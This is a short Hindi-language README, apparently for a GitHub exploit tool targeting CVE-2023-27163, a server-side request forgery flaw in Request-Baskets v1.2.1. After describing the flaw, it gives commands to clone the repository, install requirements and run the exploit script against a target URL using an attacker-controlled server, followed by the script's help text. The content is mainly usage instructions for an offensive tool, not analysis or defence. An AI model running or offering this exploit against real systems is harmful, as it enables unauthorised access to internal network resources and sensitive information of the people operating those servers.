
CVE-2023-27163 Request-Baskets v1.2.1 - सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF)
Request-Baskets v1.2.1 - सर्वर-साइड अनुरोध जालसाजी (SSRF)
request-baskets v1.2.1 तक के संस्करणों में /api/baskets/{name} घटक के माध्यम से सर्वर-साइड अनुरोध जालसाजी (SSRF) होने की खोज की गई थी। यह भेद्यता हमलावरों को एक विशेष रूप से तैयार API अनुरोध के माध्यम से नेटवर्क संसाधनों और संवेदनशील जानकारी तक पहुँचने की अनुमति देती है।
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
Request Baskets स्क्रिप्ट का शोषण करें
स्थितीय तर्क:
url सर्वर का मुख्य पथ (/) (जैसे: http://127.0.0.1:5000/)
attack_server ATTACK_SERVER
options:
-h, --help show this help message and exit